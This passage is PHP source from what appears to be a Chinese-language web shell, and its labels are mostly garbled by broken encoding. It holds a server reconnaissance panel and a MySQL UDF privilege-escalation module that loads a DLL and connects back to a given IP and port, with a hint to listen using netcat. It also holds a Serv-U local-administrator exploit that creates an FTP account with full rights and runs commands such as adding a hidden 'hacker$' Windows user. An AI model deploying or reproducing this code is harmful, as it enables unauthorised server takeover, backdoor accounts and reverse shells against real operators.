|
|||
|
$dis_func = str_replace(",","<br>",$dis_func);
|
|||
|
}
|
|||
|
$phpinfo=(!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
|
|||
|
$info = array(
|
|||
|
0 => array("<22><>ǰphp<68><70><EFBFBD><EFBFBD><EFBFBD>û<EFBFBD>",$user),
|
|||
|
1 => array("<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ϵͳ",PHP_OS),
|
|||
|
2 => array("<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʱ<EFBFBD><CAB1>",date("Y<><59>m<EFBFBD><6D>d<EFBFBD><64> h:i:s",time())),
|
|||
|
3 => array("<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>","<a href=\"http://".$_SERVER['SERVER_NAME']."\" target=\"_blank\">".$_SERVER['SERVER_NAME']."</a>"),
|
|||
|
4 => array("<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>IP<49><50>ַ",gethostbyname($_SERVER['SERVER_NAME'])),
|
|||
|
5 => array("<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ϵͳ<CFB5><CDB3><EFBFBD>ֱ<EFBFBD><D6B1><EFBFBD>",$_SERVER['HTTP_ACCEPT_LANGUAGE']),
|
|||
|
6 => array("<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>",$_SERVER['SERVER_SOFTWARE']),
|
|||
|
7 => array("Web<65><62><EFBFBD><EFBFBD><EFBFBD>˿<EFBFBD>",$_SERVER['SERVER_PORT']),
|
|||
|
8 => array("PHP<48><50><EFBFBD>з<EFBFBD>ʽ",strtoupper(php_sapi_name())),
|
|||
|
9 => array("PHP<48>汾",PHP_VERSION),
|
|||
|
10 => array("<22><><EFBFBD><EFBFBD><EFBFBD>ڰ<EFBFBD>ȫģʽ",getphpcfg("safemode")),
|
|||
|
11 => array("<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ա",$adminmail),
|
|||
|
12 => array("<22><><EFBFBD>ļ<EFBFBD>·<EFBFBD><C2B7>",__FILE__),
|
|||
|
13 => array("<22><><EFBFBD><EFBFBD>ʹ<EFBFBD><CAB9> URL <20><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD> allow_url_fopen",getphpcfg("allow_url_fopen")),
|
|||
|
14 => array("<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>̬<EFBFBD><CCAC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ӿ<EFBFBD> enable_dl",getphpcfg("enable_dl")),
|
|||
|
15 => array("<22><>ʾ<EFBFBD><CABE><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϣ display_errors",getphpcfg("display_errors")),
|
|||
|
16 => array("<22>Զ<EFBFBD><D4B6><EFBFBD><EFBFBD><EFBFBD>ȫ<EFBFBD>ֱ<EFBFBD><D6B1><EFBFBD> register_globals",getphpcfg("register_globals")),
|
|||
|
17 => array("magic_quotes_gpc",getphpcfg("magic_quotes_gpc")),
|
|||
|
18 => array("<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʹ<EFBFBD><CAB9><EFBFBD>ڴ<EFBFBD><DAB4><EFBFBD> memory_limit",getphpcfg("memory_limit")),
|
|||
|
19 => array("POST<53><54><EFBFBD><EFBFBD><EFBFBD>ֽ<EFBFBD><D6BD><EFBFBD> post_max_size",getphpcfg("post_max_size")),
|
|||
|
20 => array("<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ϴ<EFBFBD><CFB4>ļ<EFBFBD> upload_max_filesize",$upsize),
|
|||
|
21 => array("<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EEB3A4><EFBFBD><EFBFBD>ʱ<EFBFBD><CAB1> max_execution_time",getphpcfg("max_execution_time")."<22><>"),
|
|||
|
22 => array("<22><><EFBFBD><EFBFBD><EFBFBD>õĺ<C3B5><C4BA><EFBFBD> disable_functions",$dis_func),
|
|||
|
23 => array("phpinfo()",$phpinfo),
|
|||
|
24 => array("Ŀǰ<C4BF><C7B0><EFBFBD>п<EFBFBD><D0BF><EFBFBD><EFBFBD>ռ<EFBFBD>diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'),
|
|||
|
25 => array("ͼ<>δ<EFBFBD><CEB4><EFBFBD> GD Library",getfun("imageline")),
|
|||
|
26 => array("IMAP<41><50><EFBFBD><EFBFBD><EFBFBD>ʼ<EFBFBD>ϵͳ",getfun("imap_close")),
|
|||
|
27 => array("MySQL<51><4C><EFBFBD>ݿ<EFBFBD>",getfun("mysql_close")),
|
|||
|
28 => array("SyBase<73><65><EFBFBD>ݿ<EFBFBD>",getfun("sybase_close")),
|
|||
|
29 => array("Oracle<6C><65><EFBFBD>ݿ<EFBFBD>",getfun("ora_close")),
|
|||
|
30 => array("Oracle 8 <20><><EFBFBD>ݿ<EFBFBD>",getfun("OCILogOff")),
|
|||
|
31 => array("PREL<45><4C><EFBFBD><EFBFBD><EFBFBD> PCRE",getfun("preg_match")),
|
|||
|
32 => array("PDF<44>ĵ<EFBFBD>֧<EFBFBD><D6A7>",getfun("pdf_close")),
|
|||
|
33 => array("Postgre SQL<51><4C><EFBFBD>ݿ<EFBFBD>",getfun("pg_close")),
|
|||
|
34 => array("SNMP<4D><50><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Э<EFBFBD><D0AD>",getfun("snmpget")),
|
|||
|
35 => array("ѹ<><D1B9><EFBFBD>ļ<EFBFBD>֧<EFBFBD><D6A7>(Zlib)",getfun("gzclose")),
|
|||
|
36 => array("XML<4D><4C><EFBFBD><EFBFBD>",getfun("xml_set_object")),
|
|||
|
37 => array("FTP",getfun("ftp_login")),
|
|||
|
38 => array("ODBC<42><43><EFBFBD>ݿ<EFBFBD><DDBF><EFBFBD><EFBFBD><EFBFBD>",getfun("odbc_close")),
|
|||
|
39 => array("Session֧<6E><D6A7>",getfun("session_start")),
|
|||
|
40 => array("Socket֧<74><D6A7>",getfun("fsockopen")),
|
|||
|
);
|
|||
|
$tb->tableheader();
|
|||
|
echo "<form action=\"?action=phpenv\" method=\"POST\">\n";
|
|||
|
$tb->tdbody('<b><3E>鿴PHP<48><50><EFBFBD>ò<EFBFBD><C3B2><EFBFBD>״<EFBFBD><D7B4></b>','left','1','30','style="padding-left: 5px;"');
|
|||
|
$tb->tdbody('<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ò<EFBFBD><C3B2><EFBFBD>(<28><>:magic_quotes_gpc): '.$tb->makeinput('phpvarname','','','text','40').' '.$tb->makeinput('','<27>鿴','','submit'),'left','2','30','style="padding-left: 5px;"');
|
|||
|
$tb->makehidden('do','viewphpvar');
|
|||
|
echo "</form>\n";
|
|||
|
$hp = array(0=> '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>', 1=> 'PHP<48><50><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>', 2=> '<27><><EFBFBD><EFBFBD>֧<EFBFBD><D6A7>״<EFBFBD><D7B4>');
|
|||
|
for ($a=0;$a<3;$a++) {
|
|||
|
$tb->tdbody('<b>'.$hp[1].'</b>','left','1','30','style="padding-left: 5px;"');
|
|||
|
?>
|
|||
|
<tr class="secondalt">
|
|||
|
<td>
|
|||
|
<table width="100%" border="0" cellpadding="0" cellspacing="0">
|
|||
|
<?php
|
|||
|
if ($a==0) {
|
|||
|
for($i=0;$i<=12;$i++) {
|
|||
|
echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
|
|||
|
}
|
|||
|
} elseif ($a == 1) {
|
|||
|
for ($i=13;$i<=24;$i++) {
|
|||
|
echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
|
|||
|
}
|
|||
|
} elseif ($a == 2) {
|
|||
|
for ($i=25;$i<=40;$i++) {
|
|||
|
echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
|
|||
|
}
|
|||
|
}
|
|||
|
?>
|
|||
|
</table>
|
|||
|
</td>
|
|||
|
</tr>
|
|||
|
<?php
|
|||
|
}//for
|
|||
|
echo "</table>";
|
|||
|
}//end phpenv
|
|||
|
elseif($_GET['action'] == "mysqlfun"){
|
|||
|
echo "<table width=\"760\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" bgcolor=\"#ffffff\"><tr class=\"firstalt\"><td align=\"left\">";
|
|||
|
if($_POST['port'] != "" && $_POST['ip'] != "" && $_POST['function'] != "" && $_POST['host'] != "" && $_POST['user'] != "")
|
|||
|
{
|
|||
|
$link=@mysql_connect($_POST['host'],$_POST['user'],$_POST['pass']);
|
|||
|
if (!$link) {
|
|||
|
echo "<font color=red>Could not connect: ".mysql_error()."</font><br>";
|
|||
|
}
|
|||
|
else{
|
|||
|
echo "<font color=blue>Connected successfully as ".$_POST['user']."</font><br>";
|
|||
|
if(isset($_POST['mixpath'])&&!@file_exists($_POST['mixpath'])){
|
|||
|
echo"<font color=red>Can't find the ".$_POST['mixpath']."</font><br>";
|
|||
|
}
|
|||
|
if(isset($_POST['mixpath'])){
|
|||
|
$dll_path = addslashes($_POST['mixpath']);
|
|||
|
$query="create function ".$_POST['function']." returns integer soname '".$dll_path."';";
|
|||
|
echo (@mysql_query($query, $link)) ? "<font color=blue>Success: ".$query."</font><br>" : "<font color=red>Create function faild!<br>".mysql_error()."</font><br>";
|
|||
|
}
|
|||
|
echo"<font color=red>Now Select Function name of ".$_POST['function']."</font><br>";
|
|||
|
$query="select ".$_POST['function']."('".$_POST['ip']."','".$_POST['port']."');";
|
|||
|
echo (@mysql_query($query, $link)) ? "<font color=blue>Success: ".$query."</font><br>" : "<font color=red>Select Function name of ".$_POST['function']." faild!<br>".mysql_error()."</font><br>";
|
|||
|
mysql_close($link);
|
|||
|
}
|
|||
|
}else{
|
|||
|
echo"";
|
|||
|
}
|
|||
|
echo "</td></tr></table>";
|
|||
|
if($nodll=="yes"){
|
|||
|
$echodll = " <a href=\"#\" title=\"ʹ<><CAB9>˵<EFBFBD><CBB5>\" onclick=\"alert('<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ᱻaddslashes<65><73><EFBFBD><EFBFBD><EFBFBD><EFBFBD>\\\\\\<5C><><EFBFBD><EFBFBD> \\\\\\\<5C><>ȫ<EFBFBD><C8AB>д<EFBFBD><D0B4><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ύ<EFBFBD><E1BDBB>\\n\\n<><6E><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Լ<EFBFBD><D4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>nc -vv -l -p <20>˿ڣ<CBBF>ȫ<EFBFBD><C8AB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>mysql<71><6C><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>')\">(?)</a> Mixdll<6C><6C>:
|
|||
|
<input name=\"mixpath\" type=\"text\" class=\"INPUT\" value=\"C:\mix.dll\" size=\"50\"> <a href=\"?action=mysqlfun\">(<28><><EFBFBD><EFBFBD>function)</a>";
|
|||
|
}else{
|
|||
|
$echodll = "<FONT color=\"blue\"><3E>˲<EFBFBD><CBB2><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ѽ<EFBFBD>function<6F><6E><EFBFBD>й<EFBFBD><D0B9><EFBFBD><EFBFBD><EFBFBD></FONT> <a href=\"?action=mysqlfun&nodll=yes\">(δ<><CEB4>function)</a>";
|
|||
|
}
|
|||
|
?>
|
|||
|
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
|
|||
|
<tr class="firstalt">
|
|||
|
<td align="center">mysql_function<6F><6E>Ȩ<EFBFBD><C8A8>mix.dll<6C><6C></td>
|
|||
|
</tr>
|
|||
|
<form action="?action=mysqlfun" method="POST">
|
|||
|
<tr class="secondalt">
|
|||
|
<td align="center"><a href="?action=sql&type=fun">(Func)</a> <3B><><EFBFBD>ض˿<D8B6>:
|
|||
|
<input name="port" type="text" class="INPUT" value="5438" size="6"> <20><>
|
|||
|
<20><><EFBFBD><EFBFBD>IP:
|
|||
|
<input name="ip" type="text" class="INPUT" value="<?=$_SERVER['REMOTE_ADDR']?>"> <20><>function<6F><6E>:
|
|||
|
<input name="function" type="text" class="INPUT" value="Mixconnect"> <a href="?action=mix">(Mix.dll)</a>
|
|||
|
<br>
|
|||
|
Host : <input name="host" type="text" class="INPUT" value="localhost" size="12"> User : <input name="user" type="text" class="INPUT" value="root" size="8"> PassWd : <input name="pass" type="text" class="INPUT" value=""> <br>
|
|||
|
<?=$echodll?>
|
|||
|
<? echo"<input name=\"nodll\" value=\"".$nodll."\" type=\"hidden\">";?> </td>
|
|||
|
</tr>
|
|||
|
<tr class="secondalt">
|
|||
|
<td align="center"><input name="Submit" type="submit" class="input" id="Submit" value="ִ<><D6B4>"><3E><>
|
|||
|
<input name="Submit" type="reset" class="INPUT" value="<22><><EFBFBD><EFBFBD>"></td>
|
|||
|
</tr>
|
|||
|
</form>
|
|||
|
<tr class="secondalt">
|
|||
|
<td align="center">Remember,Love is a dieing dream....</td>
|
|||
|
</tr>
|
|||
|
</table>
|
|||
|
<?
|
|||
|
}
|
|||
|
elseif($_GET['action'] == "SUExp")
|
|||
|
{
|
|||
|
if($_POST['SUPort'] != "" && $_POST['SUUser'] != "" && $_POST['SUPass'] != "")
|
|||
|
{
|
|||
|
echo "<table width=\"760\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" bgcolor=\"#ffffff\"><tr class=\"firstalt\"><td align=\"left\">";
|
|||
|
$sendbuf = "";
|
|||
|
$recvbuf = "";
|
|||
|
$domain = "-SETDOMAIN\r\n".
|
|||
|
"-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n".
|
|||
|
"-TZOEnable=0\r\n".
|
|||
|
" TZOKey=\r\n";
|
|||
|
$adduser = "-SETUSERSETUP\r\n".
|
|||
|
"-IP=0.0.0.0\r\n".
|
|||
|
"-PortNo=21\r\n".
|
|||
|
"-User=".$user."\r\n".
|
|||
|
"-Password=".$password."\r\n".
|
|||
|
"-HomeDir=c:\\\r\n".
|
|||
|
"-LoginMesFile=\r\n".
|
|||
|
"-Disable=0\r\n".
|
|||
|
"-RelPaths=1\r\n".
|
|||
|
"-NeedSecure=0\r\n".
|
|||
|
"-HideHidden=0\r\n".
|
|||
|
"-AlwaysAllowLogin=0\r\n".
|
|||
|
"-ChangePassword=0\r\n".
|
|||
|
"-QuotaEnable=0\r\n".
|
|||
|
"-MaxUsersLoginPerIP=-1\r\n".
|
|||
|
"-SpeedLimitUp=0\r\n".
|
|||
|
"-SpeedLimitDown=0\r\n".
|
|||
|
"-MaxNrUsers=-1\r\n".
|
|||
|
"-IdleTimeOut=600\r\n".
|
|||
|
"-SessionTimeOut=-1\r\n".
|
|||
|
"-Expire=0\r\n".
|
|||
|
"-RatioUp=1\r\n".
|
|||
|
"-RatioDown=1\r\n".
|
|||
|
"-RatiosCredit=0\r\n".
|
|||
|
"-QuotaCurrent=0\r\n".
|
|||
|
"-QuotaMaximum=0\r\n".
|
|||
|
"-Maintenance=None\r\n".
|
|||
|
"-PasswordType=Regular\r\n".
|
|||
|
"-Ratios=None\r\n".
|
|||
|
" Access=".$part."\|RWAMELCDP\r\n";
|
|||
|
$deldomain="-DELETEDOMAIN\r\n".
|
|||
|
"-IP=0.0.0.0\r\n".
|
|||
|
" PortNo=21\r\n";
|
|||
|
$sock = fsockopen("127.0.0.1", $_POST["SUPort"], &$errno, &$errstr, 10);
|
|||
|
$recvbuf = fgets($sock, 1024);
|
|||
|
echo "<font color=red>Recv: $recvbuf</font><br>";
|
|||
|
$sendbuf = "USER ".$_POST["SUUser"]."\r\n";
|
|||
|
fputs($sock, $sendbuf, strlen($sendbuf));
|
|||
|
echo "<font color=blue>Send: $sendbuf</font><br>";
|
|||
|
$recvbuf = fgets($sock, 1024);
|
|||
|
echo "<font color=red>Recv: $recvbuf</font><br>";
|
|||
|
$sendbuf = "PASS ".$_POST["SUPass"]."\r\n";
|
|||
|
fputs($sock, $sendbuf, strlen($sendbuf));
|
|||
|
echo "<font color=blue>Send: $sendbuf</font><br>";
|
|||
|
$recvbuf = fgets($sock, 1024);
|
|||
|
echo "<font color=red>Recv: $recvbuf</font><br>";
|
|||
|
$sendbuf = "SITE MAINTENANCE\r\n";
|
|||
|
fputs($sock, $sendbuf, strlen($sendbuf));
|
|||
|
echo "<font color=blue>Send: $sendbuf</font><br>";
|
|||
|
$recvbuf = fgets($sock, 1024);
|
|||
|
echo "<font color=red>Recv: $recvbuf</font><br>";
|
|||
|
$sendbuf = $domain;
|
|||
|
fputs($sock, $sendbuf, strlen($sendbuf));
|
|||
|
echo "<font color=blue>Send: $sendbuf</font><br>";
|
|||
|
$recvbuf = fgets($sock, 1024);
|
|||
|
echo "<font color=red>Recv: $recvbuf</font><br>";
|
|||
|
$sendbuf = $adduser;
|
|||
|
fputs($sock, $sendbuf, strlen($sendbuf));
|
|||
|
echo "<font color=blue>Send: $sendbuf</font><br>";
|
|||
|
$recvbuf = fgets($sock, 1024);
|
|||
|
echo "<font color=red>Recv: $recvbuf</font><br>";
|
|||
|
echo "**********************************************************<br>";
|
|||
|
if($job!=="adduser"){//<2F><><EFBFBD>費<EFBFBD>ǽ<EFBFBD><C7BD><EFBFBD><EFBFBD>û<EFBFBD>
|
|||
|
echo "Starting Exploit ...<br>";
|
|||
|
echo "**********************************************************<br>";
|
|||
|
$exp = fsockopen("127.0.0.1", "21", &$errno, &$errstr, 10);
|
|||
|
$recvbuf = fgets($exp, 1024);
|
|||
|
echo "<font color=red>Recv: $recvbuf</font><br>";
|
|||
|
$sendbuf = "USER ".$user."\r\n";
|
|||
|
fputs($exp, $sendbuf, strlen($sendbuf));
|
|||
|
echo "<font color=blue>Send: $sendbuf</font><br>";
|
|||
|
$recvbuf = fgets($exp, 1024);
|
|||
|
echo "<font color=red>Recv: $recvbuf</font><br>";
|
|||
|
$sendbuf = "PASS ".$password."\r\n";
|
|||
|
fputs($exp, $sendbuf, strlen($sendbuf));
|
|||
|
echo "<font color=blue>Send: $sendbuf</font><br>";
|
|||
|
$recvbuf = fgets($exp, 1024);
|
|||
|
echo "<font color=red>Recv: $recvbuf</font><br>";
|
|||
|
$sendbuf = "site exec ".$_POST["SUCommand"]."\r\n";
|
|||
|
fputs($exp, $sendbuf, strlen($sendbuf));
|
|||
|
echo "<font color=blue>Send: site exec</font> <font color=green>".$_POST["SUCommand"]."</font><br>";
|
|||
|
$recvbuf = fgets($exp, 1024);
|
|||
|
echo "<font color=red>Recv: $recvbuf</font><br>";
|
|||
|
echo "**********************************************************<br>";
|
|||
|
echo "Starting Delete Domain ...<br>";
|
|||
|
echo "**********************************************************<br>";
|
|||
|
$sendbuf = $deldomain;
|
|||
|
fputs($sock, $sendbuf, strlen($sendbuf));
|
|||
|
echo "<font color=blue>Send: $sendbuf</font><br>";
|
|||
|
$recvbuf = fgets($sock, 1024);
|
|||
|
echo "<font color=red>Recv: $recvbuf</font><br>";
|
|||
|
}else{
|
|||
|
echo "All done ...<br>";
|
|||
|
echo "**********************************************************<br>";
|
|||
|
}
|
|||
|
echo "</td></tr></table>";
|
|||
|
fclose($sock);
|
|||
|
if($job!=="adduser") fclose($exp);
|
|||
|
}
|
|||
|
?>
|
|||
|
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
|
|||
|
<tr class="firstalt">
|
|||
|
<td align="center">ͨ<><CDA8>Serv-U <20><><EFBFBD>ع<EFBFBD><D8B9><EFBFBD>Ա<EFBFBD>ʺ<EFBFBD>ִ<EFBFBD><D6B4><EFBFBD><EFBFBD><EFBFBD><EFBFBD> & <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></td>
|
|||
|
</tr>
|
|||
|
<form action="?action=SUExp" method="POST">
|
|||
|
<tr class="secondalt">
|
|||
|
<td align="center">LocalPort:
|
|||
|
<input name="SUPort" type="text" class="INPUT" id="SUPort" value="43958" size="7"> <20><>
|
|||
|
LocalUser:
|
|||
|
<input name="SUUser" type="text" class="INPUT" id="SUUser" value="LocalAdministrator"> <20><>LocalPass:
|
|||
|
<input name="SUPass" type="text" class="INPUT" id="SUPass" value="#l@$ak#.lk;0@P">
|
|||
|
<br>
|
|||
|
<?php
|
|||
|
if($job!=="adduser"){
|
|||
|
?>
|
|||
|
Command<6E><64>:
|
|||
|
<input name="SUCommand" type="text" class="INPUT" id="SUCommand" value="net user hacker$ hacker /add" size="50"> <a href="?action=SUExp&job=adduser">(<28><><EFBFBD><EFBFBD><EFBFBD>û<EFBFBD>)</a> - <a href="#" title="ʹ<><CAB9>˵<EFBFBD><CBB5>" onClick="alert('<27><>ѡ<EFBFBD><D1A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>û<EFBFBD><C3BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>hacker$<24><><EFBFBD><EFBFBD>Ϊhacker<65><72><EFBFBD>ʺŲ<CABA><C5B2><EFBFBD>EXP<58><50><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ɾ<EFBFBD><C9BE><EFBFBD><EFBFBD><EFBFBD><EFBFBD>hacker<65><72>\n\n<><6E><EFBFBD><EFBFBD><EFBFBD>û<EFBFBD><C3BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Լ<EFBFBD><D4BC><EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD><D2BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ա<EFBFBD>ʺ<EFBFBD><CABA>õģ<C3B5><C4A3><EFBFBD>ִ<EFBFBD><D6B4>site exec <20><><EFBFBD>\n\n<><6E><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>õ<EFBFBD>һ<EFBFBD><D2BB><EFBFBD><EFBFBD>ѡĿ¼<C4BF><C2BC>ȫ<EFBFBD><C8AB><EFBFBD><EFBFBD>Ȩ<EFBFBD><EFBFBD><DEB5><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>')">(?)</a>
|
|||
|
<input name="user" type="hidden" value="hacker$">
|
|||
|
<input name="password" type="hidden" value="hacker">
|
|||
|
<input name="part" type="hidden" value="C:\">
|
|||
|
<?}
|
|||
|
else{
|
|||
|
?>
|
|||
|
<09>ʺ<EFBFBD>:
|
|||
|
<input name="user" type="text" class="INPUT" value="hacker$" size="20">
|
|||
|
<20><><EFBFBD><EFBFBD>:
|
|||
|
<input name="password" type="text" class="INPUT" value="hacker" size="20">
|
|||
|
Ŀ¼:
|
|||
|
<input name="part" type="text" class="INPUT" value="C:\" size="20">
|
|||
|
<a href="?action=SUExp">(ִ<><D6B4>CMD)</a> - <a href="#" title="ʹ<><CAB9>˵<EFBFBD><CBB5>" onClick="alert('<27>ص<EFBFBD>ִ<EFBFBD><D6B4><EFBFBD><EFBFBD><EFBFBD>')">(?)</a>
|
|||
|
<input name="job" type="hidden" value="<?=$job?>">
|
|||
|
<?php
|
|||
|
}
|
|||
|
?></td>
|
|||
|
</tr>
|
|||
|
<tr class="secondalt">
|
|||
|
<td align="center"><input name="Submit" type="submit" class="input" id="Submit" value="ִ<><D6B4>"><3E><>
|
|||
|
<input name="Submit" type="reset" class="INPUT" value="<22><><EFBFBD><EFBFBD>"></td>
|
|||
|
</tr>
|
|||
|
</form>
|
|||
|
</table>
|
|||
|
<?php
|
|||
|
}
|
|||
|
?>
|
|||
|
<hr width="775" noshade>
|
|||
|
<table width="775" border="0" cellpadding="0">
|
|||
|
<tr>
|
|||
|
<td><FONT color=#ff3300><3E><><EFBFBD><EFBFBD>:<3A><><EFBFBD><EFBFBD>ʹ<EFBFBD>ñ<EFBFBD><C3B1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·Ƿ<C2B7><C7B7><EFBFBD>Ϊ<EFBFBD><CEAA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ը<EFBFBD><D4B8><EFBFBD></font></td>
|
|||
|
<td align="right"><?php
|
|||
|
debuginfo();
|
|||
|
ob_end_flush();
|
|||
|
?></td>
|
|||
|
</tr>
|
|||
|
</table>
|
|||
|
</center>
|
|||
|
</body>
|
|||
|
</html>
|
|||
|
|
|||
|
<?php
|
|||
|
|
|||
|
/*======================================================
|
|||
|
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
======================================================*/
|
|||
|
|
|||
|
// <20><>½<EFBFBD><C2BD><EFBFBD><EFBFBD>
|
|||
|
function loginpage() {
|
|||
|
global $hidden,$alexa;
|
|||
|
if($hidden=="44997"){
|
|||
|
?>
|
|||
|
<style type="text/css">
|
|||
|
input {font-family: "Verdana";font-size: "11px";BACKGROUND-COLOR: "#FFFFFF";height: "18px";border: "1px solid #666666";}
|
|||
|
</style>
|
|||
|
<table width="416" border="0" align="center" cellpadding="0" cellspacing="0">
|
|||
|
<form method="POST" action="">
|
|||
|
<tr>
|
|||
|
<td height="75" align="center">
|
|||
|
<span style="font-size: 11px; font-family: Verdana"><3E><><EFBFBD><EFBFBD>: </span><input name="adminpass" type="password" size="20">
|
|||
|
<input type="hidden" name="do" value="login">
|
|||
|
<input type="submit" value="<22><>½">
|
|||
|
</td>
|
|||
|
</tr>
|
|||
|
</form>
|
|||
|
<?php
|
|||
|
if($alexa!=="no"){
|
|||
|
?>
|
|||
|
</table>
|
|||
|
<?}
|
|||
|
}?>
|
|||
|
<?php
|
|||
|
exit;
|
|||
|
}//end loginpage()
|
|||
|
|
|||
|
// ҳ<><D2B3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϣ
|
|||
|
function debuginfo() {
|
|||
|
global $starttime;
|
|||
|
$mtime = explode(' ', microtime());
|
|||
|
$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
|
|||
|
echo "ҳ<><D2B3>ִ<EFBFBD><D6B4><EFBFBD><EFBFBD> $totaltime <20><>";
|
|||
|
}
|
|||
|
|
|||
|
// ȥ<><C8A5>ת<EFBFBD><D7AA><EFBFBD>ַ<EFBFBD>
|
|||
|
function stripslashes_array(&$array) {
|
|||
|
while(list($key,$var) = each($array)) {
|
|||
|
if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
|
|||
|
if (is_string($var)) {
|
|||
|
$array[$key] = stripslashes($var);
|
|||
|
}
|
|||
|
if (is_array($var)) {
|
|||
|
$array[$key] = stripslashes_array($var);
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
return $array;
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
// ɾ<><C9BE>Ŀ¼
|
|||
|
function deltree($deldir) {
|
|||
|
$mydir=@dir($deldir);
|
|||
|
while($file=$mydir->read()) {
|
|||
|
if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
|
|||
|
@chmod("$deldir/$file",0777);
|
|||
|
deltree("$deldir/$file");
|
|||
|
}
|
|||
|
if (is_file("$deldir/$file")) {
|
|||
|
@chmod("$deldir/$file",0777);
|
|||
|
@unlink("$deldir/$file");
|
|||
|
}
|
|||
|
}
|
|||
|
$mydir->close();
|
|||
|
@chmod("$deldir",0777);
|
|||
|
return (@rmdir($deldir)) ? 1 : 0;
|
|||
|
}
|
|||
|
|
|||
|
// <20>ж϶<D0B6>д<EFBFBD><D0B4><EFBFBD><EFBFBD>
|
|||
|
function dir_writeable($dir) {
|
|||
|
if (!is_dir($dir)) {
|
|||
|
@mkdir($dir, 0777);
|
|||
|
}
|
|||
|
if(is_dir($dir)) {
|
|||
|
if ($fp = @fopen("$dir/test.txt", 'w')) {
|
|||
|
@fclose($fp);
|
|||
|
@unlink("$dir/test.txt");
|
|||
|
$writeable = 1;
|
|||
|
} else {
|
|||
|
$writeable = 0;
|
|||
|
}
|
|||
|
}
|
|||
|
return $writeable;
|
|||
|
}
|
|||
|
|
|||
|
// <20><><EFBFBD><EFBFBD><EFBFBD>м<EFBFBD><D0BC>ı<EFBFBD><C4B1><EFBFBD>ɫ<EFBFBD>滻
|
|||
|
function getrowbg() {
|
|||
|
global $bgcounter;
|
|||
|
if ($bgcounter++%2==0) {
|
|||
|
return "firstalt";
|
|||
|
} else {
|
|||
|
return "secondalt";
|
|||
|
}
